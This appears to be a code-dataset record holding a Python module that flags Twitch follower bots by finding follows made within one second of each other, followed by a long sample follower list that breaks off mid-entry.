# DeliveryStreamName='zugdaten',
# Record={
# 'Data': json.dumps(j[0])
# })
except Exception as ex:
print(ex)
print("%s was not processed properly" % file)
else:
print("False")
| 34.752809 | 143 | 0.598879 |
d95f95a1eede807bb4243a355e85152a2c6589d6 | 45,996 | py | Python | src/bot_detection.py | data-day-life/twitch_rec | 614071fe474d589fe610a5fd62eb8ba9fa509143 | [
"MIT"
] | null | null | null | src/bot_detection.py | data-day-life/twitch_rec | 614071fe474d589fe610a5fd62eb8ba9fa509143 | [
"MIT"
] | null | null | null | src/bot_detection.py | data-day-life/twitch_rec | 614071fe474d589fe610a5fd62eb8ba9fa509143 | [
"MIT"
] | null | null | null | from dateutil.parser import parse as dt_parse
class BotDetector:
def __init__(self):
self.total_removed = 0
def __str__(self):
return f'Removed {self.total_removed} potential follower bots total.'
@staticmethod
def parse_times(foll_list):
"""
Utilizes python's dateutil parser to convert follow times to datetime objects for comparison.
Args:
foll_list (list):
A list of dictionaries in follower_reply['data'] from Twitch with format:
[{'from_id': '123', 'from_name': 'xyz', 'to_id': '456', 'to_name': 'abc',
'followed_at': '2020-06-28T04:57:07Z'}, ...]
Returns:
A list of datetime objects that can be used to compare the difference in follow times between a sequence of
followers.
"""
return [dt_parse(follower.get('followed_at', None)) for follower in foll_list]
def detect_follower_bot_uids(self, foll_list: list, print_status: bool = False) -> set:
"""
When given a follower list, this function flags uids that may be bots. Bots are detected by computing the time
difference between a sequence of two followers. Users are flagged as 'bots' when they follow a streamer_uid in
rapid succession.
Args:
foll_list (list):
A list of dictionaries in follower_reply['data'] from Twitch with format:
[{'from_id': '123', 'from_name': 'xyz', 'to_id': '456', 'to_name': 'abc',
'followed_at': '2020-06-28T04:57:07Z'}, ...]
print_status (bool):
Prints summary output of detected bots.
Returns:
A set of flagged user id's as ('1234', '4567', ...)
"""
flagged_bot_uids = set()
flagged_idxs = list()
# Parse all times with datetime
parsed_list = self.parse_times(foll_list)
one_sec = 1
if len(parsed_list) > 1:
            # Compare each follower's follow time with the next follower's; the final entry is handled below
for idx in range(len(parsed_list)-1):
if (parsed_list[idx] - parsed_list[idx+1]).total_seconds() <= one_sec:
flagged_bot_uids.add(foll_list[idx].get('from_id', None))
flagged_idxs.append(idx)
# Compare final two and add last item if necessary
if (parsed_list[-2] - parsed_list[-1]).total_seconds() <= one_sec:
flagged_bot_uids.add(foll_list[-1].get('from_id', None))
flagged_idxs.append(len(parsed_list)-1)
if print_status:
print(f'Detected {len(flagged_bot_uids)} follower bot(s) in follower list.')
print(f'Flagged (idx, uid): {[flagged for flagged in zip(flagged_idxs, flagged_bot_uids)]}')
return flagged_bot_uids
def remove_foll_bot_uids(self, foll_list: list, flagged_bot_uids: set = None) -> list:
"""
Removes flagged bot uids from a follower list but retains the initial format of the follower list.
Args:
foll_list (list):
A list of dictionaries in follower_reply['data'] from Twitch with format:
[{'from_id': '123', 'from_name': 'xyz', 'to_id': '456', 'to_name': 'abc',
'followed_at': '2020-06-28T04:57:07Z'}, ...]
flagged_bot_uids (set):
A set of flagged uids that are most likely bots. If no set is provided then it will be produced by
calling detect_follower_bot_uids()
Returns:
A sanitized follower list in the original foll_list format.
"""
if not flagged_bot_uids:
flagged_bot_uids = self.detect_follower_bot_uids(foll_list)
self.total_removed += len(flagged_bot_uids)
return [follower for follower in foll_list if follower.get('from_id') not in flagged_bot_uids]
def sanitize_foll_list(self, foll_list: list) -> list:
"""
Performs detection and removal of follower bots and returns a sanitized list of uids.
Args:
foll_list (list):
A list of dictionaries in follower_reply['data'] from Twitch with format:
[{'from_id': '123', 'from_name': 'xyz', 'to_id': '456', 'to_name': 'abc',
'followed_at': '2020-06-28T04:57:07Z'}, ...]
Returns:
A list of sanitized follower id's as ['1234', '456', ...]
"""
flagged_bot_uids = self.detect_follower_bot_uids(foll_list)
sanitized_uids = self.remove_foll_bot_uids(foll_list, flagged_bot_uids)
return [follower.get('from_id', None) for follower in sanitized_uids]
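# A minimal usage sketch. The follower dicts are trimmed to the two keys the detector
# actually reads, and are ordered newest-first as Twitch returns them:
#
#   detector = BotDetector()
#   followers = [
#       {'from_id': '1', 'followed_at': '2020-04-13T10:00:00Z'},
#       {'from_id': '2', 'followed_at': '2020-04-11T03:52:27Z'},
#       {'from_id': '3', 'followed_at': '2020-04-11T03:52:27Z'},
#   ]
#   detector.detect_follower_bot_uids(followers)  # -> {'2', '3'} (followed within 1 sec of each other)
#   detector.sanitize_foll_list(followers)        # -> ['1']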
def main():
bot_det = BotDetector()
sample_foll_list = [{'from_id': '74812972', 'from_name': 'Oiee', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-28T04:57:07Z'}, {'from_id': '186648072', 'from_name': 'MajorCamper12', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-27T05:35:34Z'}, {'from_id': '541844169', 'from_name': 'danielis52525', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-27T03:55:38Z'}, {'from_id': '227452570', 'from_name': 'slam6000', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-26T03:43:30Z'}, {'from_id': '546467589', 'from_name': 'farhadgames', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-22T00:49:56Z'}, {'from_id': '506674369', 'from_name': 'rxseanon', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-21T04:53:24Z'}, {'from_id': '540171341', 'from_name': 'bronson223', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-20T06:59:41Z'}, {'from_id': '134639096', 'from_name': 'RollingFlowers', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-20T05:58:09Z'}, {'from_id': '536605822', 'from_name': 'spicyftw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-01T06:13:11Z'}, {'from_id': '189336802', 'from_name': 'Mrdragon9968', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-01T04:10:33Z'}, {'from_id': '514062872', 'from_name': 'n00b_head', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-30T05:03:37Z'}, {'from_id': '99915227', 'from_name': 'Nosle3pn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-29T17:18:02Z'}, {'from_id': '233951670', 'from_name': 'PercyGrunwald', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-29T17:15:27Z'}, {'from_id': '452466999', 'from_name': 'xprestige', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-23T04:34:26Z'}, {'from_id': '531065971', 'from_name': 'pokemon_loverz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-23T03:54:27Z'}, {'from_id': '501675989', 'from_name': 'scruffy_armadillo_daking', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-23T03:40:31Z'}, {'from_id': '450004898', 'from_name': 'brosephballin9', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-13T04:07:47Z'}, {'from_id': '529146961', 'from_name': 'tefurcule1989', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-11T17:03:11Z'}, {'from_id': '528272096', 'from_name': 'kaymen_cyder', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-11T06:17:08Z'}, {'from_id': '528596967', 'from_name': 'ertisinkey1977', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-10T13:21:57Z'}, {'from_id': '223057951', 'from_name': 'wild0ttv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-07T21:32:12Z'}, {'from_id': '527110911', 'from_name': 'eganenpros1976', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-07T18:23:10Z'}, {'from_id': '122386377', 'from_name': 'aspie8675', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-05T21:29:40Z'}, {'from_id': '279742959', 'from_name': 'UhhApple', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-02T08:11:31Z'}, {'from_id': '521051913', 'from_name': 'dfxsfather', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-30T06:48:34Z'}, {'from_id': '466107921', 'from_name': 'lietuviss', 'to_id': '106071345', 'to_name': 'stroopC', 
'followed_at': '2020-04-28T09:02:19Z'}, {'from_id': '460500001', 'from_name': 'achimedes', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-27T22:06:10Z'}, {'from_id': '501880128', 'from_name': 'kelooks', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-27T09:01:19Z'}, {'from_id': '177726472', 'from_name': 'Footbucket', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-27T03:25:32Z'}, {'from_id': '520578689', 'from_name': 'lxyboi', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-26T00:14:39Z'}, {'from_id': '485843821', 'from_name': 'king32175', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-22T05:27:59Z'}, {'from_id': '238199105', 'from_name': 'kaeden456', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-22T04:35:00Z'}, {'from_id': '516742317', 'from_name': 'warzonewarrior17', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-21T05:16:58Z'}, {'from_id': '516953407', 'from_name': 'hamburgerking12', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-21T05:16:40Z'}, {'from_id': '516842027', 'from_name': 'dxrk_clappy', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-20T05:23:44Z'}, {'from_id': '416604658', 'from_name': 'vogulemagazine', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-20T02:51:00Z'}, {'from_id': '516377788', 'from_name': 'ringwisbackti1972', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-18T12:03:52Z'}, {'from_id': '516283808', 'from_name': 'shino_zap', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-18T06:45:38Z'}, {'from_id': '515678307', 'from_name': 'renorcali1988', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-17T13:06:45Z'}, {'from_id': '515678198', 'from_name': 'dandpameka1973', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-17T12:09:34Z'}, {'from_id': '503984671', 'from_name': 'yizzysszn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-17T06:09:33Z'}, {'from_id': '514729005', 'from_name': 'ceypsorarac1984', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-15T19:09:43Z'}, {'from_id': '514295793', 'from_name': 'hargtranlubo1971', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-15T01:06:48Z'}, {'from_id': '226425431', 'from_name': 'Vulknan', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T05:23:48Z'}, {'from_id': '248417306', 'from_name': 'reelraiders0q', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244480120', 'from_name': 'witwixch', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248290726', 'from_name': 'kunshikittyq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486320509', 'from_name': 'Arrestpartzdrot', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248403304', 'from_name': 'kragieed', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248329834', 'from_name': 'ggriagq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485509966', 'from_name': 'spyswr', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485618594', 'from_name': 'rhythmnnm', 'to_id': '106071345', 'to_name': 
'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244408792', 'from_name': 'djulestvl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479440626', 'from_name': 'permissiblefish17', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248322133', 'from_name': 'pocketstreamc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479450485', 'from_name': 'pondFloralaod', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479449146', 'from_name': 'gladeAutumnVCR', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248403496', 'from_name': 'girl2clutchh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248399070', 'from_name': 'kortneyplayso', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244390413', 'from_name': 'ezequielrogel7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479443835', 'from_name': 'cherryfxz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248363156', 'from_name': 'itsliaaac', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248291915', 'from_name': 'dossierchannel0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485626851', 'from_name': 'harmonyp0W', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492157447', 'from_name': 'nutProduce', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492162196', 'from_name': 'GrassvXc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248364026', 'from_name': 'magalzaoshowvm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492151786', 'from_name': 'knowledgepjl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485530780', 'from_name': 'cherryeos', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492135548', 'from_name': 'fogFallingamg', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486323547', 'from_name': 'Respectindustrious', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244479813', 'from_name': 'xduracelv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492168807', 'from_name': 'frypailimm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248388656', 'from_name': 'dota2ti_5i', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244496965', 'from_name': 'idropz_bodies6', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244390517', 'from_name': 'talon2461u', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244412294', 'from_name': 'shortyyguyt', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248328431', 'from_name': 'daddy_law_694', 
'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486328998', 'from_name': 'maskfuturistic', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486318753', 'from_name': 'snowlisa98', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248373549', 'from_name': 'kep_vorobei5', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244415158', 'from_name': 'loryfl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244428037', 'from_name': 'lakexl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248362291', 'from_name': 'delkonixv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244375144', 'from_name': 'mouzakrobat7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244412341', 'from_name': 'sorabi_u', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486327174', 'from_name': 'discoveryaqE', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248404944', 'from_name': 'fuzzface496', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486315094', 'from_name': 'breadvjd', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485566907', 'from_name': 'silvernar', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479449228', 'from_name': 'Borderbbs', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492128950', 'from_name': 'shapecuo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248397504', 'from_name': 'qksnipermh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492139643', 'from_name': 'drivingexn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492168064', 'from_name': 'earvcn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492171359', 'from_name': 'Dustpolished199', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486318031', 'from_name': 'Burstpfu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492148038', 'from_name': 'Sleepygroup77', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244412390', 'from_name': 'vorhalaj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '243804052', 'from_name': 'mikailstreamp', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244467010', 'from_name': 'giggand4', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492126126', 'from_name': 'wisheux', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244405431', 'from_name': 'wtfgamenationo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248340992', 'from_name': 'twozerothreetvp', 'to_id': 
'106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485518673', 'from_name': 'statementzzW', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244389239', 'from_name': 'linkdeadx24', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248401782', 'from_name': 'rorichannik', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486323007', 'from_name': 'Lisanwf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485532403', 'from_name': 'schoolMWP', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492107378', 'from_name': 'CoastTravel', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248376273', 'from_name': 'thepandorahousef', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492152791', 'from_name': 'partGrandfather208', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248364043', 'from_name': 'frankkasterq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248399004', 'from_name': 'dernicoqs', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244427961', 'from_name': 'blackfireiced', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486323197', 'from_name': 'absorbfightjt0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248378934', 'from_name': 'superarcades', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485549328', 'from_name': 'Waterfallygu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244495726', 'from_name': 'bagel411u', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248328378', 'from_name': 'gametime3010', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248364051', 'from_name': 'aliciawinsf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248359180', 'from_name': 'g4non_gamesynb', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485526001', 'from_name': 'personCreepy', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492130937', 'from_name': 'Oceanwxe', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485546684', 'from_name': 'slipChange', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244419280', 'from_name': 'andrewbraveh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244424551', 'from_name': 'shannaninaf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244431869', 'from_name': 'dncbry', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248292990', 'from_name': 'jelyfishtnaj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486328405', 'from_name': 
'wheel0mk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248362790', 'from_name': 'orrsat', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492119347', 'from_name': 'ChalkDOG', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248379726', 'from_name': 'twizzj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248376966', 'from_name': 'rustycablemanh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248388551', 'from_name': 'xodalivel', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492164804', 'from_name': 'scarecrowmajestic', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244467811', 'from_name': 'ninja_with_no_l4b', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248317149', 'from_name': 'thechief11147', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244483235', 'from_name': 'rolandoellis812', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248311881', 'from_name': 'saifcameltvjq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485510472', 'from_name': 'fatherqSv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492122207', 'from_name': 'donaldrabbitssHY', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492132639', 'from_name': 'Tankconsign', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248359111', 'from_name': 'petritlpl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244427864', 'from_name': 'cyborgangelo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248344716', 'from_name': 'curvyllamah', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248353925', 'from_name': 'thi3n6', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492142555', 'from_name': 'Morninghdo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486318313', 'from_name': 'cherryproud97', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486322390', 'from_name': 'monthunequaled', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244484704', 'from_name': 'daddydimmutvs', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244441903', 'from_name': 'gspotdotag', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244412995', 'from_name': 'coollermx', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248374317', 'from_name': 'wetforjesuso', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248311777', 'from_name': 'proudamericans5', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': 
'248386769', 'from_name': 'versutax5', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248340994', 'from_name': 'noelmiller1', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485552626', 'from_name': 'gladePatientvsq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '479451818', 'from_name': 'debt403', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248293118', 'from_name': 'realbambamg', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248322110', 'from_name': 'antdude92y', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248336316', 'from_name': 'hexybi', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485623475', 'from_name': 'dustAutumn173', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248364710', 'from_name': 'thorw8', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492141393', 'from_name': 'turngwq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485564335', 'from_name': 'ShockJasone0t', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492135828', 'from_name': 'frogr00', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492108297', 'from_name': 'bedroomzip', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244485205', 'from_name': 'pocketstreamh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': 